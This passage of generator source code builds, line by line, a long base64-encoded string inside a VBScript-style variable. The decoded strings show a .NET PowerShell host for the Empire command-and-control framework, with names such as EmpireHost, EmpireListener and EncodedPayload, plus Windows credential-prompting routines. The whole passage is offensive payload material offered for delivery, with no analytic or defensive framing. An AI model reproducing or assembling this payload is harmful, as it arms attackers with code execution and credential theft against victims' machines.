            code +="s = s & \"AKIAUwACAKMAVQABAKQAVQACAKUAVwABAKYAVwACAKcAWQABAKgAWQACAKkAWwABAKoAWwAYESIR\"\n"
            code +="s = s & \"igDSAN4AYAFpAXsBtAHNAQsCEQIYAqMCwgKcA+ID7wMAAT8AYwgBAAYBQQADGQIABgFDAEEVAgAE\"\n"
            code +="s = s & \"AVkB6BgCAAQBWwEDGQIARAFdASQVAgBEAV8BJBUCAEQBYQFBFQIARAFjAUEVAgAEgAAAAQAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAABqHAAAAgAAAAAAAAAAAAAAOQRzBAAAAAADAAUAAAAAAAAAAAA5BPkKAAAAAAEAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAEIEIhIAAAAAAgAAAAAAAAAAAAAAOQSSEQAAAAANAAUADgAIAA8ACAAQAAgAEQAIABIA\"\n"
            code +="s = s & \"CAATAAwAFAASABUAEgAAAAQA1wDhAwAABADxAOED1gBhA9YAawPwAGED8ABrA2sB3gMBACQAAgAk\"\n"
            code +="s = s & \"AAAAADw+Y19fRGlzcGxheUNsYXNzMF8wADxUb1NlY3VyZVN0cmluZz5iX18wAElFbnVtZXJhYmxl\"\n"
            code +="s = s & \"YDEAQWN0aW9uYDEAUFNEYXRhQ29sbGVjdGlvbmAxAFBTTWVtYmVySW5mb0NvbGxlY3Rpb25gMQBJ\"\n"
            code +="s = s & \"RW51bWVyYXRvcmAxAExpc3RgMQBNaWNyb3NvZnQuV2luMzIASW50MzIARGljdGlvbmFyeWAyAFJl\"\n"
            code +="s = s & \"YWRJbnQxNgBXcml0ZUludDE2ADxNb2R1bGU+AENSRURVSVdJTl9HRU5FUklDAEhhbmRsZUNvbnRy\"\n"
            code +="s = s & \"b2xDAENSRURVSV9GTEFHU19SRVFVSVJFX1NNQVJUQ0FSRABDUkVEVUlfRkxBR1NfSU5DT1JSRUNU\"\n"
            code +="s = s & \"X1BBU1NXT1JEAENSRURVSV9GTEFHU19WQUxJREFURV9VU0VSTkFNRQBDUkVEVUlfRkxBR1NfQ09N\"\n"
            code +="s = s & \"UExFVEVfVVNFUk5BTUUAQ1JFRFVJX0ZMQUdTX0tFRVBfVVNFUk5BTUUAQ1JFRFVJX0ZMQUdTX1JF\"\n"
            code +="s = s & \"UVVJUkVfQ0VSVElGSUNBVEUAQ1JFRFVJX01BWF9QQVNTV09SRF9MRU5HVEgAQ1JFRFVJX01BWF9N\"\n"
            code +="s = s & \"RVNTQUdFX0xFTkdUSABDUkVEX01BWF9VU0VSTkFNRV9MRU5HVEgAQ1JFRFVJX01BWF9VU0VSTkFN\"\n"
            code +="s = s & \"RV9MRU5HVEgAQ1JFRFVJX01BWF9DQVBUSU9OX0xFTkdUSABDUkVEVUlfRkxBR1NfQUxXQVlTX1NI\"\n"
            code +="s = s & \"T1dfVUkAZ2V0X1VJAENyZWRlbnRpYWxVSQBnZXRfUmF3VUkAQ1JFRFVJX0ZMQUdTX1BBU1NXT1JE\"\n"
            code +="s = s & \"X09OTFlfT0sAQ1JFRFVJX0ZMQUdTX1NFUlZFUl9DUkVERU5USUFMAENSRURVSV9GTEFHU19FWFBF\"\n"
            code +="s = s & \"Q1RfQ09ORklSTUFUSU9OAENSRURVSV9JTkZPAFN5c3RlbS5JTwBDUkVEVUlXSU5fRU5VTUVSQVRF\"\n"
            code +="s = s & \"X0NVUlJFTlRfVVNFUgBDUkVEVUlfRkxBR1NfUkVRVUVTVF9BRE1JTklTVFJBVE9SAENSRURVSV9G\"\n"
            code +="s = s & \"TEFHU19FWENMVURFX0NFUlRJRklDQVRFUwBDUkVEVUlfRkxBR1NfR0VORVJJQ19DUkVERU5USUFM\"\n"
            code +="s = s & \"UwBDUkVEVUlfRkxBR1NfVVNFUk5BTUVfVEFSR0VUX0NSRURFTlRJQUxTAENSRURVSVdJTl9FTlVN\"\n"
            code +="s = s & \"RVJBVEVfQURNSU5TAENSRURVSVdJTl9TRUNVUkVfUFJPTVBUAENSRURVSV9GTEFHU19QRVJTSVNU\"\n"
            code +="s = s & \"AENSRURVSV9GTEFHU19ET19OT1RfUEVSU0lTVABDUkVEVUlXSU5fUEFDS18zMl9XT1cAQ1JFRFVJ\"\n"
            code +="s = s & \"V0lOX0NIRUNLQk9YAENSRURVSV9GTEFHU19TSE9XX1NBVkVfQ0hFQ0tfQk9YAGdldF9YAENSRURV\"\n"
            code +="s = s & \"SVdJTl9JTl9DUkVEX09OTFkAQ1JFRFVJV0lOX0FVVEhQQUNLQUdFX09OTFkAZ2V0X1kAdmFsdWVf\"\n"
            code +="s = s & \"XwBtc2NvcmxpYgBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBzcmMAZ2V0X0luc3RhbmNlSWQA\"\n"
            code +="s = s & \"aW5zdGFuY2VJZABzb3VyY2VJZABzaGVsbElkAGdldF9DdXJyZW50VGhyZWFkAEVuY29kZWRQYXls\"\n"
            code +="s = s & \"b2FkAEFkZABnZXRfSXNSdW5zcGFjZVB1c2hlZABnZXRfSXNTYXZlQ2hlY2tlZABzZXRfSXNTYXZl\"\n"
            code +="s = s & \"Q2hlY2tlZABDYW5jZWxsZWQAUmVzZXJ2ZWQATmV3R3VpZAA8SXNTYXZlQ2hlY2tlZD5rX19CYWNr\"\n"
            code +="s = s & \"aW5nRmllbGQAPFBhc3N3b3JkPmtfX0JhY2tpbmdGaWVsZAA8QXV0aEVycm9yQ29kZT5rX19CYWNr\"\n"
            code +="s = s & \"aW5nRmllbGQAPERvbWFpbk5hbWU+a19fQmFja2luZ0ZpZWxkADxVc2VyTmFtZT5rX19CYWNraW5n\"\n"
            code +="s = s & \"RmllbGQAPFRhcmdldE5hbWU+a19fQmFja2luZ0ZpZWxkADxIYm1CYW5uZXI+a19fQmFja2luZ0Zp\"\n"
            code +="s = s & \"ZWxkADxGbGFncz5rX19CYWNraW5nRmllbGQAPEh3bmRQYXJlbnQ+a19fQmFja2luZ0ZpZWxkAGNt\"\n"
            code +="s = s & \"ZABQU0NvbW1hbmQAQWRkQ29tbWFuZABBcHBlbmQAZ2V0X0Vycm9yUmVjb3JkAElDb250YWluc0Vy\"\n"
            code +="s = s & \"cm9yUmVjb3JkAFByb2dyZXNzUmVjb3JkAHJlY29yZABnZXRfUGFzc3dvcmQAc2V0X1Bhc3N3b3Jk\"\n"
            code +="s = s & \"AHBjY2hNYXhQYXNzd29yZABwc3pQYXNzd29yZABwYXNzd29yZABQU0hvc3RVc2VySW50ZXJmYWNl\"\n"
            code +="s = s & \"AE15SG9zdFVzZXJJbnRlcmZhY2UAbXlIb3N0VXNlckludGVyZmFjZQBQU0hvc3RSYXdVc2VySW50\"\n"
            code +="s = s & \"ZXJmYWNlAE15UmF3VXNlckludGVyZmFjZQBteVJ1blNwYWNlAGdldF9SdW5zcGFjZQBzZXRfUnVu\"\n"
            code +="s = s & \"c3BhY2UAcHVzaGVkUnVuc3BhY2UAQ3JlYXRlUnVuc3BhY2UAUHVzaFJ1bnNwYWNlAFBvcFJ1bnNw\"\n"
            code +="s = s & \"YWNlAHJ1bnNwYWNlAFByb21wdEZvckNob2ljZQBkZWZhdWx0Q2hvaWNlAHNvdXJjZQBDcmVkVUlQ\"\n"
            code +="s = s & \"cm9tcHRSZXR1cm5Db2RlAGdldF9BdXRoRXJyb3JDb2RlAHNldF9BdXRoRXJyb3JDb2RlAGdldF9F\"\n"
            code +="s = s & \"eGl0Q29kZQBzZXRfRXhpdENvZGUAZXhpdENvZGUAZ2V0X1VuaWNvZGUAWmVyb0ZyZWVDb1Rhc2tN\"\n"
            code +="s = s & \"ZW1Vbmljb2RlAFNlY3VyZVN0cmluZ1RvQ29UYXNrTWVtVW5pY29kZQBDb1Rhc2tNZW1GcmVlAHB1\"\n"
            code +="s = s & \"bEF1dGhQYWNrYWdlAGF1dGhQYWNrYWdlAGdldF9NZXNzYWdlAHNldF9NZXNzYWdlAF9tZXNzYWdl\"\n"
            code +="s = s & \"AEludm9rZQBnZXRfS2V5QXZhaWxhYmxlAElFbnVtZXJhYmxlAElEaXNwb3NhYmxlAFJ1bnRpbWVU\"\n"
            code +="s = s & \"eXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFJlY3RhbmdsZQByZWN0YW5nbGUARmlsZQBHZXRE\"\n"
            code +="s = s & \"b2xsYXJQcm9maWxlAHVzZVRlc3RQcm9maWxlAEVtcGlyZUxpc3RlbmVyQ29uc29sZQBnZXRfVGl0\"\n"
            code +="s = s & \"bGUAc2V0X1RpdGxlAGdldF9XaW5kb3dUaXRsZQBzZXRfV2luZG93VGl0bGUAZ2V0X05hbWUAR2V0\"\n"
            code +="s = s & \"RnVsbFByb2ZpbGVGaWxlTmFtZQBnZXRfRG9tYWluTmFtZQBzZXRfRG9tYWluTmFtZQBnZXRfVXNl\"\n"
            code +="s = s & \"ckRvbWFpbk5hbWUAcHN6RG9tYWluTmFtZQBnZXRfVXNlck5hbWUAc2V0X1VzZXJOYW1lAHBjY2hN\"\n"
            code +="s = s & \"YXhVc2VyTmFtZQBwc3pVc2VyTmFtZQB1c2VyTmFtZQBnZXRfVGFyZ2V0TmFtZQBzZXRfVGFyZ2V0\"\n"
            code +="s = s & \"TmFtZQBwc3pUYXJnZXROYW1lAHRhcmdldE5hbWUAR2V0RGlyZWN0b3J5TmFtZQBwY2NoTWF4RG9t\"\n"
            code +="s = s & \"YWluYW1lAFJlYWRMaW5lAFdyaXRlVmVyYm9zZUxpbmUAV3JpdGVMaW5lAFdyaXRlV2FybmluZ0xp\"\n"
            code +="s = s & \"bmUAV3JpdGVEZWJ1Z0xpbmUAV3JpdGVFcnJvckxpbmUAQ29tYmluZQBMb2NhbE1hY2hpbmUAVmFs\"\n"
            code +="s = s & \"dWVUeXBlAG5vdFVzZWRIZXJlAFN5c3RlbS5Db3JlAGdldF9DdXJyZW50VUlDdWx0dXJlAGdldF9D\"\n"
            code +="s = s & \"dXJyZW50Q3VsdHVyZQBQb3dlclNoZWxsRW5naW5lQXBwbGljYXRpb25CYXNlAEdldEFwcGxpY2F0\"\n"
            code +="s = s & \"aW9uQmFzZQBEaXNwb3NlAENyZWF0ZQBnZXRfU3RhdGUASW5pdGlhbFNlc3Npb25TdGF0ZQBQU0lu\"\n"
            code +="s = s & \"dm9jYXRpb25TdGF0ZQBDb21wbGV0ZQBXcml0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBH\"\n"
            code +="s = s & \"dWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3Nl\"\n"
            code +="s = s & \"bWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEV4dGVuc2lvbkF0\"\n"
            code +="s = s & \"dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlv\"\n"
            code +="s = s & \"bkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENv\"\n"
            code +="s = s & \"bXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFz\"\n"
            code +="s = s & \"c2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1l\"\n"
            code +="s = s & \"Q29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBFeGVjdXRlAEdldFZhbHVlAHZhbHVlAHBmU2F2ZQBSZW1v\"\n"
            code +="s = s & \"dmUAY2JTaXplAGdldF9CdWZmZXJTaXplAHNldF9CdWZmZXJTaXplAHVsSW5BdXRoQnVmZmVyU2l6\"\n"
            code +="s = s & \"ZQByZWZPdXRBdXRoQnVmZmVyU2l6ZQBwdWxPdXRBdXRoQnVmZmVyU2l6ZQBhdXRoQnVmZmVyU2l6\"\n"
            code +="s = s & \"ZQBTZXRCdWZmZXJTaXplAGdldF9DdXJzb3JTaXplAHNldF9DdXJzb3JTaXplAGdldF9XaW5kb3dT\"\n"
            code +="s = s & \"aXplAHNldF9XaW5kb3dTaXplAGdldF9NYXhQaHlzaWNhbFdpbmRvd1NpemUAU2V0V2luZG93U2l6\"\n"
            code +="s = s & \"ZQBnZXRfTWF4V2luZG93U2l6ZQBTaXplT2YAUHJvbXB0Rm9yQ3JlZGVudGlhbHNGbGFnAFByb21w\"\n"
            code +="s = s & \"dEZvcldpbmRvd3NDcmVkZW50aWFsc0ZsYWcAU3lzdGVtLlRocmVhZGluZwBFbmNvZGluZwBGcm9t\"\n"
            code +="s = s & \"QmFzZTY0U3RyaW5nAFByb21wdEZvckNyZWRlbnRpYWxzV2l0aFNlY3VyZVN0cmluZwBQcm9tcHRG\"\n"
            code +="s = s & \"b3JXaW5kb3dzQ3JlZGVudGlhbHNXaXRoU2VjdXJlU3RyaW5nAFByb21wdFdpdGhTZWN1cmVTdHJp\"\n"
            code +="s = s & \"bmcAUHRyVG9TZWN1cmVTdHJpbmcAQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyV3JhcFNl\"\n"
            code +="s = s & \"Y3VyZVN0cmluZwBSZWFkTGluZUFzU2VjdXJlU3RyaW5nAFRvU3RyaW5nAEdldFN0cmluZwBTdWJz\"\n"
            code +="s = s & \"dHJpbmcARm9yRWFjaABHZXRBbGxVc2Vyc0ZvbGRlclBhdGgAR2V0Rm9sZGVyUGF0aABQb3dlclNo\"\n"
            code +="s = s & \"ZWxsUm9vdEtleVBhdGgAZ2V0X1dpZHRoAGdldF9CdWZmZXJXaWR0aABnZXRfV2luZG93V2lkdGgA\"\n"
            code +="s = s & \"Z2V0X0xhcmdlc3RXaW5kb3dXaWR0aABnZXRfTGVuZ3RoAGxlbmd0aABteVJhd1VpAFB0clRvU3Ry\"\n"
            code +="s = s & \"aW5nVW5pAGluc3RhbmNlTG9jawBNYXJzaGFsAFBTQ3JlZGVudGlhbABQcm9tcHRGb3JDcmVkZW50\"\n"
            code +="s = s & \"aWFsAFByb21wdEZvckNyZWRlbnRpYWxzSW50ZXJuYWwAUHJvbXB0Rm9yV2luZG93c0NyZWRlbnRp\"\n"
            code +="s = s & \"YWxzSW50ZXJuYWwAZ2V0X0xhYmVsAEdldEhvdGtleUFuZExhYmVsAHNldF9DYW5jZWwAU3lzdGVt\"\n"
            code +="s = s & \"LkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsAFN5c3RlbS5Db21wb25lbnRNb2RlbABvbGUzMi5kbGwA\"\n"
            code +="s = s & \"Y3JlZHVpLmRsbABFbXBpcmVIb3N0LmRsbABCdWZmZXJDZWxsAGN1cnJlbnRQb3dlclNoZWxsAGZp\"\n"
            code +="s = s & \"bGwAcHJvZ3JhbQBSZUFsbG9jQ29UYXNrTWVtAGdldF9JdGVtAHNldF9JdGVtAE9wZXJhdGluZ1N5\"\n"
            code +="s = s & \"c3RlbQBUcmltAEVudW0AT3BlbgBvcmlnaW4AZ2V0X09TVmVyc2lvbgBnZXRfVmVyc2lvbgBJSG9z\"\n"
            code +="s = s & \"dFN1cHBvcnRzSW50ZXJhY3RpdmVTZXNzaW9uAE5vdGlmeUVuZEFwcGxpY2F0aW9uAE5vdGlmeUJl\"\n"
            code +="s = s & \"Z2luQXBwbGljYXRpb24AZ2V0X0xvY2F0aW9uAFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24A\"\n"
            code +="s = s & \"ZGVzdGluYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24ASUhvc3RVSVN1cHBvcnRzTXVsdGlwbGVD\"\n"
            code +="s = s & \"aG9pY2VTZWxlY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24AQ29tbWFuZENvbGxlY3Rpb24AZ2V0X0N1\"\n"
            code +="s = s & \"cnNvclBvc2l0aW9uAHNldF9DdXJzb3JQb3NpdGlvbgBnZXRfV2luZG93UG9zaXRpb24Ac2V0X1dp\"\n"
            code +="s = s & \"bmRvd1Bvc2l0aW9uAFNldFdpbmRvd1Bvc2l0aW9uAGdldF9DYXB0aW9uAHNldF9DYXB0aW9uAF9j\"\n"
            code +="s = s & \"YXB0aW9uAFdpbjMyRXhjZXB0aW9uAE5vdEltcGxlbWVudGVkRXhjZXB0aW9uAEFyZ3VtZW50T3V0\"\n"
            code +="s = s & \"T2ZSYW5nZUV4Y2VwdGlvbgBSdW50aW1lRXhjZXB0aW9uAEFyZ3VtZW50TnVsbEV4Y2VwdGlvbgBS\"\n"
            code +="s = s & \"ZXBvcnRFeGNlcHRpb24AU2VjdXJpdHlFeGNlcHRpb24ARmllbGREZXNjcmlwdGlvbgBDaG9pY2VE\"\n"
            code +="s = s & \"ZXNjcmlwdGlvbgBvcmlnaW5hbFVJQ3VsdHVyZUluZm8Ab3JpZ2luYWxDdWx0dXJlSW5mbwBQU0lu\"\n"
            code +="s = s & \"dm9jYXRpb25TdGF0ZUluZm8AZ2V0X0ludm9jYXRpb25TdGF0ZUluZm8AcFVpSW5mbwBLZXlJbmZv\"\n"
            code +="s = s & \"AFBTUHJvcGVydHlJbmZvAFplcm8AQ3JlZFVuUGFja0F1dGhlbnRpY2F0aW9uQnVmZmVyV3JhcABj\"\n"
            code +="s = s & \"bGlwAGdldF9XaW5kb3dUb3AAU3RvcABTeXN0ZW0uTGlucQBBcHBlbmRDaGFyAElGb3JtYXRQcm92\"\n"
            code +="s = s & \"aWRlcgBTdHJpbmdCdWlsZGVyAFNwZWNpYWxGb2xkZXIAc2VuZGVyAGNiQXV0aEJ1ZmZlcgBwdklu\"\n"
            code +="s = s & \"QXV0aEJ1ZmZlcgBwQXV0aEJ1ZmZlcgByZWZPdXRBdXRoQnVmZmVyAHBwdk91dEF1dGhCdWZmZXIA\"\n"
            code +="s = s & \"Q3JlZFBhY2tBdXRoZW50aWNhdGlvbkJ1ZmZlcgBDcmVkVW5QYWNrQXV0aGVudGljYXRpb25CdWZm\"\n"
            code +="s = s & \"ZXIARmx1c2hJbnB1dEJ1ZmZlcgBzZXRfQXV0aG9yaXphdGlvbk1hbmFnZXIARXhlY3V0ZVN0YWdl\"\n"
            code +="s = s & \"cgBFbXBpcmVMaXN0ZW5lcgBnZXRfSGJtQmFubmVyAHNldF9IYm1CYW5uZXIAaGJtQmFubmVyAGV4\"\n"
            code +="s = s & \"ZWN1dGVIZWxwZXIAVG9VcHBlcgBmb3JDdXJyZW50VXNlcgBBZGRQYXJhbWV0ZXIASW52YWxpZFBh\"\n"
            code +="s = s & \"cmFtZXRlcgBFbnRlcgBnZXRfTWFqb3IAZ2V0X0ZvcmVncm91bmRDb2xvcgBzZXRfRm9yZWdyb3Vu\"\n"
            code +="s = s & \"ZENvbG9yAGZvcmVncm91bmRDb2xvcgBnZXRfQmFja2dyb3VuZENvbG9yAHNldF9CYWNrZ3JvdW5k\"\n"
            code +="s = s & \"Q29sb3IAYmFja2dyb3VuZENvbG9yAENvbnNvbGVDb2xvcgBHZXRMYXN0V2luMzJFcnJvcgBkd0F1\"\n"
            code +="s = s & \"dGhFcnJvcgBhdXRoRXJyb3IASUVudW1lcmF0b3IAR2V0RW51bWVyYXRvcgAuY3RvcgAuY2N0b3IA\"\n"
            code +="s = s & \"TW9uaXRvcgBhdXRoQnVmZmVyUHRyAEludFB0cgBwdHIAU3lzdGVtLkRpYWdub3N0aWNzAGdldF9D\"\n"
            code +="s = s & \"b21tYW5kcwBzZXRfQ29tbWFuZHMAR2V0UHJvZmlsZUNvbW1hbmRzAE5hdGl2ZU1ldGhvZHMARXh0\"\n"
            code +="s = s & \"ZW5zaW9uTWV0aG9kcwBTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcwBkZWZh\"\n"
            code +="s = s & \"dWx0Q2hvaWNlcwBjaG9pY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0u\"\n"
            code +="s = s & \"UnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAEhvc3RVdGlsaXRpZXMAZ2V0\"\n"
            code +="s = s & \"X1Byb3BlcnRpZXMAUFNDcmVkZW50aWFsVHlwZXMAYWxsb3dlZENyZWRlbnRpYWxUeXBlcwBQaXBl\"\n"
            code +="s = s & \"bGluZVJlc3VsdFR5cGVzAENvb3JkaW5hdGVzAGdldF9GbGFncwBzZXRfRmxhZ3MASW52YWxpZEZs\"\n"
            code +="s = s & \"YWdzAGR3RmxhZ3MAZmxhZ3MAQ29uc29sZUNhbmNlbEV2ZW50QXJncwBwY2JQYWNrZWRDcmVkZW50\"\n"
            code +="s = s & \"aWFscwBwUGFja2VkQ3JlZGVudGlhbHMAZGVjcnlwdFByb3RlY3RlZENyZWRlbnRpYWxzAENyZWRV\"\n"
            code +="s = s & \"SVByb21wdEZvckNyZWRlbnRpYWxzAENyZWRVSVByb21wdEZvcldpbmRvd3NDcmVkZW50aWFscwBC\"\n"
            code +="s = s & \"dWlsZEhvdGtleXNBbmRQbGFpbkxhYmVscwBTeXN0ZW0uQ29sbGVjdGlvbnMAUFNDcmVkZW50aWFs\"\n"
            code +="s = s & \"VUlPcHRpb25zAFNjb3BlZEl0ZW1PcHRpb25zAFByb21wdEZvckNyZWRlbnRpYWxzT3B0aW9ucwBQ\"\n"
            code +="s = s & \"cm9tcHRGb3JXaW5kb3dzQ3JlZGVudGlhbHNPcHRpb25zAFJlYWRLZXlPcHRpb25zAGRlc2NyaXB0\"\n"
            code +="s = s & \"aW9ucwBvcHRpb25zAGdldF9DaGFycwB1bFBhc3N3b3JkTWF4Q2hhcnMAdWxVc2VyTmFtZU1heENo\"\n"
            code +="s = s & \"YXJzAFN1Y2Nlc3MAV3JpdGVQcm9ncmVzcwBNZXJnZU15UmVzdWx0cwBTY3JvbGxCdWZmZXJDb250\"\n"
            code +="s = s & \"ZW50cwBHZXRCdWZmZXJDb250ZW50cwBTZXRCdWZmZXJDb250ZW50cwBjb250ZW50cwBFeGlzdHMA\"\n"
            code +="s = s & \"Y3VycmVudFVzZXJBbGxIb3N0cwBhbGxVc2Vyc0FsbEhvc3RzAENvbmNhdABBcHBlbmRGb3JtYXQA\"\n"
            code +="s = s & \"QXNQU09iamVjdABnZXRfQmFzZU9iamVjdABHZXQAU2V0AGdldF9XaW5kb3dMZWZ0AGdldF9IZWln\"\n"
            code +="s = s & \"aHQAZ2V0X0J1ZmZlckhlaWdodABnZXRfV2luZG93SGVpZ2h0AGdldF9MYXJnZXN0V2luZG93SGVp\"\n"
            code +="s = s & \"Z2h0AFNwbGl0AGdldF9TaG91bGRFeGl0AHNldF9TaG91bGRFeGl0AFNldFNob3VsZEV4aXQAc2hv\"\n"
            code +="s = s & \"dWxkRXhpdABDcmVhdGVEZWZhdWx0AFByb21wdENyZWRlbnRpYWxzU2VjdXJlU3RyaW5nUmVzdWx0\"\n"
            code +="s = s & \"AElQcm9tcHRDcmVkZW50aWFsc1Jlc3VsdAByZXN1bHQARW52aXJvbm1lbnQAZ2V0X0h3bmRQYXJl\"\n"
            code +="s = s & \"bnQAc2V0X0h3bmRQYXJlbnQAaHduZFBhcmVudABnZXRfQ3VycmVudABnZXRfQ291bnQAQWRkU2Ny\"\n"
            code +="s = s & \"aXB0AEVudGVyTmVzdGVkUHJvbXB0AEV4aXROZXN0ZWRQcm9tcHQAQ29udmVydABUb0xpc3QAU3lz\"\n"
            code +="s = s & \"dGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0AFBTSG9zdABFbXBpcmVIb3N0AGN1cnJlbnRV\"\n"
            code +="s = s & \"c2VyQ3VycmVudEhvc3QAYWxsVXNlcnNDdXJyZW50SG9zdABNeUhvc3QAbXlIb3N0AGlucHV0AE1v\"\n"
            code +="s = s & \"dmVOZXh0AFN5c3RlbS5UZXh0AHBzek1lc3NhZ2VUZXh0AHBzekNhcHRpb25UZXh0AFRvQXJyYXkA\"\n"
            code +="s = s & \"VG9DaGFyQXJyYXkAT3BlblN1YktleQBSZWFkS2V5AFBvd2VyU2hlbGxFbmdpbmVLZXkAUmVnaXN0\"\n"
            code +="s = s & \"cnlWZXJzaW9uS2V5AFJlZ2lzdHJ5S2V5AEdldEFzc2VtYmx5AEdldEVudHJ5QXNzZW1ibHkATWFr\"\n"
            code +="s = s & \"ZVJlYWRPbmx5AEVycm9yQ2F0ZWdvcnkAUnVuc3BhY2VGYWN0b3J5AFJlZ2lzdHJ5AGdldF9DYXBh\"\n"
            code +="s = s & \"Y2l0eQBzZXRfQ2FwYWNpdHkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0eQBTeXN0ZW0uU2VjdXJp\"\n"
            code +="s = s & \"dHkASXNOdWxsT3JFbXB0eQBQU05vdGVQcm9wZXJ0eQAAAAtEAHUAbQBtAHkAABVQAG8AdwBlAHIA\"\n"
            code +="s = s & \"UwBoAGUAbABsAAAXbwB1AHQALQBkAGUAZgBhAHUAbAB0AAEpSABvAHMAdAAuAFIAZQBwAG8AcgB0\"\n"
            code +="s = s & \"AEUAeABjAGUAcAB0AGkAbwBuAAANJABpAG4AcAB1AHQAABVvAHUAdAAtAHMAdAByAGkAbgBnAAEN\"\n"
            code +="s = s & \"RQBtAHAAaQByAGUAAIClQwBhAG4AbgBvAHQAIABzAHUAcwBwAGUAbgBkACAAdABoAGUAIABzAGgA\"\n"
            code +="s = s & \"ZQBsAGwALAAgAEUAbgB0AGUAcgBOAGUAcwB0AGUAZABQAHIAbwBtAHAAdAAoACkAIABtAGUAdABo\"\n"
            code +="s = s & \"AG8AZAAgAGkAcwAgAG4AbwB0ACAAaQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAATQB5AEgA\"\n"
            code +="s = s & \"bwBzAHQALgAAd1QAaABlACAARQB4AGkAdABOAGUAcwB0AGUAZABQAHIAbwBtAHAAdAAoACkAIABt\"\n"
            code +="s = s & \"AGUAdABoAG8AZAAgAGkAcwAgAG4AbwB0ACAAaQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAA\"\n"
            code +="s = s & \"TQB5AEgAbwBzAHQALgAAAwoAAAMgAAAVfAB7ADAAfQA+ACAAewAxAH0AIAAAI1sARABlAGYAYQB1\"\n"
            code +="s = s & \"AGwAdAAgAGkAcwAgACgAewAwAH0AXQAAIUkAbgB2AGEAbABpAGQAIABjAGgAbwBpAGMAZQA6ACAA\"\n"
            code +="s = s & \"ACtbAEQAZQBmAGEAdQBsAHQAIABjAGgAbwBpAGMAZQBzACAAYQByAGUAIAAAJ1sARABlAGYAYQB1\"\n"
            code +="s = s & \"AGwAdAAgAGMAaABvAGkAYwBlACAAaQBzACAAAA0iAHsAMAB9ACIALAAAA10AABlDAGgAbwBpAGMA\"\n"
            code +="s = s & \"ZQBbAHsAMAB9AF0AOgAAFUQARQBCAFUARwA6ACAAewAwAH0AABlWAEUAUgBCAE8AUwBFADoAIAB7\"\n"
            code +="s = s & \"ADAAfQAAGVcAQQBSAE4ASQBOAEcAOgAgAHsAMAB9AAAhQQBsAGwAVQBzAGUAcgBzAEEAbABsAEgA\"\n"
            code +="s = s & \"bwBzAHQAcwAAJ0EAbABsAFUAcwBlAHIAcwBDAHUAcgByAGUAbgB0AEgAbwBzAHQAACdDAHUAcgBy\"\n"
            code +="s = s & \"AGUAbgB0AFUAcwBlAHIAQQBsAGwASABvAHMAdABzAAAtQwB1AHIAcgBlAG4AdABVAHMAZQByAEMA\"\n"
            code +="s = s & \"dQByAHIAZQBuAHQASABvAHMAdAAAGXMAZQB0AC0AdgBhAHIAaQBhAGIAbABlAAEJTgBhAG0AZQAA\"\n"
            code +="s = s & \"D3AAcgBvAGYAaQBsAGUAAAtWAGEAbAB1AGUAAA1PAHAAdABpAG8AbgAAI1cAaQBuAGQAbwB3AHMA\"\n"
            code +="s = s & \"UABvAHcAZQByAFMAaABlAGwAbAAAF3AAcgBvAGYAaQBsAGUALgBwAHMAMQAAIXAAcgBvAGYAaQBs\"\n"
            code +="s = s & \"AGUAXwB0AGUAcwB0AC4AcABzADEAAANfAABhUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMA\"\n"
            code +="s = s & \"bwBmAHQAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAMQBcAFAAbwB3AGUAcgBTAGgAZQBsAGwARQBu\"\n"
            code +="s = s & \"AGcAaQBuAGUAAB9BAHAAcABsAGkAYwBhAHQAaQBvAG4AQgBhAHMAZQAAgItUAGgAZQAgAEMAdQBy\"\n"
            code +="s = s & \"AHMAbwByAFAAbwBzAGkAdABpAG8AbgAgAHAAcgBvAHAAZQByAHQAeQAgAGkAcwAgAG4AbwB0ACAA\"\n"
            code +="s = s & \"aQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAATQB5AFIAYQB3AFUAcwBlAHIASQBuAHQAZQBy\"\n"
            code +="s = s & \"AGYAYQBjAGUALgAAgI1UAGgAZQAgAEcAZQB0AEIAdQBmAGYAZQByAEMAbwBuAHQAZQBuAHQAcwAg\"\n"
            code +="s = s & \"AG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkA\"\n"
            code +="s = s & \"IABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAAB9VABoAGUAIABSAGUAYQBk\"\n"
